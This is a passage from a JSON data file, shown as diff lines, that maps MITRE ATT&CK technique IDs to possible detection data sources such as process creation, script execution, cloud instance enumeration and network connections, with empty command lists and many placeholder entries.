"parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": 
NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": 
NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": 
[], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": 
[NaN + ] + }, + { + "technique_id": "T1583.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1564.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "file", + "definition": "Information about 
file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1580", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": 
"Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "instances" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "described", + "target_data_element": "instances" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "viewed", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot metadata", + "description": "Data and information that describe a snapshot and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + 
"target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot enumeration", + "description": "A snapshot was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage metadata", + "description": "Data and information that describe a cloud storage and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud storage" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage enumeration", + "description": "A cloud storage was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud storage buckets" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage enumeration", + "description": "A cloud storage was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud storage objects" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", 
+ "Windows", + "Linux", + "macOS" + ], + "data_component": "volume metadata", + "description": "Data and information that describe a volume and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume enumeration", + "description": "A volume was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "volume" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1218.012", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances 
of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1205.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an 